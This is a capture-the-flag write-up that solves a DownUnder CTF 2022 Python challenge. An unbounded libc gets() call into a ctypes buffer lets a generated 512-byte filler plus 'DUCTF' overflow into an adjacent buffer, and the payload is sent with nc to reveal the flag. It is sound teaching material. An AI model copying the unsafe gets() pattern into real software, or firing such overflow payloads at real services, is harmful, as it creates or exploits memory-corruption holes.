babyp(y)wn is a pwn challenge from the 2022 DownUnder CTF. To get the flag, we need to exploit a buffer overflow in a Python script. The script runs as a service on a remote server, but we are given its source code.

File

babypwn.py

#!/usr/bin/env python3

from ctypes import CDLL, c_buffer
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
buf1 = c_buffer(512)            # 512-byte ctypes buffer that receives the input
buf2 = c_buffer(512)            # second 512-byte buffer, allocated right after buf1
libc.gets(buf1)                 # unbounded read: gets() has no length argument
if b'DUCTF' in bytes(buf2):     # the check is on buf2, which the input never targets directly
    print(open('./flag.txt', 'r').read())

Vulnerability

The script is vulnerable to a buffer overflow. gets reads a whole line from standard input into buf1 with no length limit, so any input longer than 512 bytes is written past the end of buf1. buf2 is located directly after buf1 in memory. The script checks whether buf2 contains the string “DUCTF” and, if it does, prints the flag. So if we overflow buf1 and overwrite the start of buf2 with “DUCTF”, we get the flag.

Execution of the Exploit

getString.py

#!/usr/bin/env python
# 128 * 4 = 512 bytes of filler to fill buf1, then the marker that must land in buf2.
# The printed repr keeps the b'...' wrapper; that is the line pasted into the service.
print("b'" + "p2o-" * (512 // 4) + "DUCTF'")

Command:

./getString.py

Output:

b'p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-DUCTF'

Then we send that string to the service to get the flag:

nc 2022.ductf.dev 30021
b'p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-DUCTF'
DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}

Flag

The flag is “DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}”.